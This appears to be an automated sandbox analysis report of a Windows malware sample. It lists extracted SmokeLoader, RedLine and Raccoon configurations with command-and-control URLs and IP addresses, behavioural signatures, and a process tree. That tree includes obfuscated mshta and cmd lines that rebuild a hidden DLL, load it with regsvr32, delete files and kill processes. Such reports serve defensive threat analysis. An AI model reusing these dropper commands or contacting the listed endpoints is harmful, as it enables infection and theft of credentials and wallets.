Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
13-11-2021 21:50
General
-
Target
dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600.exe
-
Size
315KB
-
MD5
b52c132e6000c854d16a83c40409977f
-
SHA1
c1d708eb3a35a3e0665d92c0a98ced9db2419923
-
SHA256
dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600
-
SHA512
c25f18574864afe84468a64a932df0aacdd3efe788f0ebda545153017c2af50ec75dfa64dbe683943e90ae48261c865cd35c24e16af37c0b2639798762ae2f48
Malware Config
Extracted
smokeloader
2020
http://host-file-host6.com/
http://host-host-file8.com/
http://srtuiyhuali.at/
http://fufuiloirtu.com/
http://amogohuigotuli.at/
http://novohudosovu.com/
http://brutuilionust.com/
http://bubushkalioua.com/
http://dumuilistrati.at/
http://verboliatsiaeeees.com/
Extracted
redline
185.159.80.90:38637
Extracted
redline
SuperStar
185.215.113.29:36224
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
Extracted
raccoon
1.8.3-hotfix
675718a5f2ce6d3cacf6cb04a512f5637eae995f
-
url4cnc
http://91.219.236.27/agrybirdsgamerept
http://5.181.156.92/agrybirdsgamerept
http://91.219.236.207/agrybirdsgamerept
http://185.225.19.18/agrybirdsgamerept
http://91.219.237.227/agrybirdsgamerept
http://185.163.47.176/agrybirdsgamerept
Extracted
redline
imbest
45.153.186.153:56675
Extracted
redline
stay clean
95.168.174.42:42482
Signatures
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 10 IoCs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 3 IoCs
-
suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
suricata: ET MALWARE Likely Zbot Generic Request to gate.php Dotted-Quad
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
suricata: ET MALWARE Trojan Generic - POST To gate.php with no accept headers
-
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
suricata: ET MALWARE Trojan Generic - POST To gate.php with no referer
-
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 7 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Kills process with taskkill 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600.exe"C:\Users\Admin\AppData\Local\Temp\dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600.exe"C:\Users\Admin\AppData\Local\Temp\dcba7c36b83b569d84f0e71207ccffd26aa6b9d9befb00279887f761ac76f600.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
C:\Users\Admin\AppData\Local\Temp\398A.exeC:\Users\Admin\AppData\Local\Temp\398A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\398A.exeC:\Users\Admin\AppData\Local\Temp\398A.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\3E3E.exeC:\Users\Admin\AppData\Local\Temp\3E3E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3E3E.exeC:\Users\Admin\AppData\Local\Temp\3E3E.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\kX5qSrTPrxDqSOf.exe"C:\Users\Admin\AppData\Local\Temp\kX5qSrTPrxDqSOf.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\kX5qSrTPrxDqSOf.exe"{path}"4⤵
- Executes dropped EXE
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4053.exeC:\Users\Admin\AppData\Local\Temp\4053.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\4630.exeC:\Users\Admin\AppData\Local\Temp\4630.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4630.exeC:\Users\Admin\AppData\Local\Temp\4630.exe2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\4DA3.exeC:\Users\Admin\AppData\Local\Temp\4DA3.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 364 -s 8802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\61A9.exeC:\Users\Admin\AppData\Local\Temp\61A9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\6F08.exeC:\Users\Admin\AppData\Local\Temp\6F08.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"3⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Local\Temp\CE6F.exeC:\Users\Admin\AppData\Local\Temp\CE6F.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect ( "WSCrIpt.ShElL" ). Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\CE6F.exe"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk & IF """"== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\CE6F.exe"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\CE6F.exe" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk & IF ""== "" for %S IN ( "C:\Users\Admin\AppData\Local\Temp\CE6F.exe" ) do taskkill -f /iM "%~NXS"3⤵
-
C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRiPt: cLoSE ( CreaTEObJect ( "WSCrIpt.ShElL" ). Run ( "CMd.EXe /Q/c COPY /Y ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk & IF ""/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk ""== """" for %S IN ( ""C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE"" ) do taskkill -f /iM ""%~NXS"" " , 0 , TrUE ))5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q/c COPY /Y "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ..\SIOFYL_.eXE && sTarT ..\SioFyL_.exE /PqgNvw4IlDLT7hpq3_wecIlKVwsIMk & IF "/PqgNvw4IlDLT7hpq3_wecIlKVwsIMk "== "" for %S IN ( "C:\Users\Admin\AppData\Local\Temp\SIOFYL_.eXE" ) do taskkill -f /iM "%~NXS"6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbscrIPT: cLOSE ( cREateObJeCt ( "wscRiPt.SHELl" ). Run ( "cMd /r Echo | set /P = ""MZ"" > V_DXQ.No & COPY /y /b V_dXQ.NO + WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C + Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q * " ,0 , tRuE ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r Echo | set /P = "MZ" > V_DXQ.No & COPY /y /b V_dXQ.NO + WX0Cjy.A + BPROiU.ZB +oWfJ6VGN.C + Yg_AN9.GRP ..\CXSXSHYX.ZBV & STARt regsvr32 ..\CxSXSHYX.ZBV -s & dEL /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Echo "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>V_DXQ.No"7⤵
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\CxSXSHYX.ZBV -s7⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /iM "CE6F.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E93B.exeC:\Users\Admin\AppData\Local\Temp\E93B.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
39.5MB
-
Filesize
572KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
128KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
36KB
-
Filesize
32KB
-
Filesize
1.3MB
-
Filesize
39.5MB
-
Filesize
696KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
36KB
-
Filesize
204KB
-
Filesize
8KB
-
Filesize
108KB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
428KB
-
Filesize
464KB
-
Filesize
60KB
-
Filesize
6.0MB
-
Filesize
144KB
-
Filesize
56KB
-
Filesize
124KB
-
Filesize
624KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
428KB
-
Filesize
48KB
-
Filesize
28KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
724KB
-
Filesize
720KB
-
Filesize
36KB
-
Filesize
60KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
176KB
-
Filesize
180KB
-
Filesize
176KB
-
Filesize
1.3MB
-
Filesize
39.4MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB